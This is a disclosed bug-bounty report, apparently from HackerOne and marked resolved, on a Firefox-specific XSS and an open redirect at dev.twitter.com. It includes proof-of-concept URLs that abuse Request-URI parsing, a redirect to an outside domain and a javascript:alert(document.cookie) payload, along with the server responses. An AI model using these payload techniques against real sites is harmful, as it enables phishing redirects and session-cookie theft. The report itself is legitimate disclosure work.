[dev.twitter.com] XSS and Open Redirect
Medium
Vulnerability Details
Description
===
XSS via Request-URI which requires user interaction. The vulnerability is caused by the difference in the Request-URI processing in the Location header and in the link on the page.
By creating an incorrect port in the link on the Location header, you can block the redirection for the FireFox browser. Next, using the difference in the processing, generate a "javascript" link on the page.
PoC: Open Redirect
===
Browsers: Chrome, FireFox, Opera
```
https://dev.twitter.com/https:/%5cblackfan.ru/
```
HTTP Response:
```http
HTTP/1.1 302 Found
connection: close
...
location: https:/\blackfan.ru
```
PoC: XSS
===
Browsers: FireFox
Steps to reproduce: Open and click the link
```
https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/
```
HTTP Response:
```http
HTTP/1.1 302 Found
connection: close
...
location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)
...
<p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>. If not click the link.
```
{F213436}
Actions
View on HackerOneReport Stats
- Report ID: 260744
- State: Closed
- Substate: resolved
- Upvotes: 68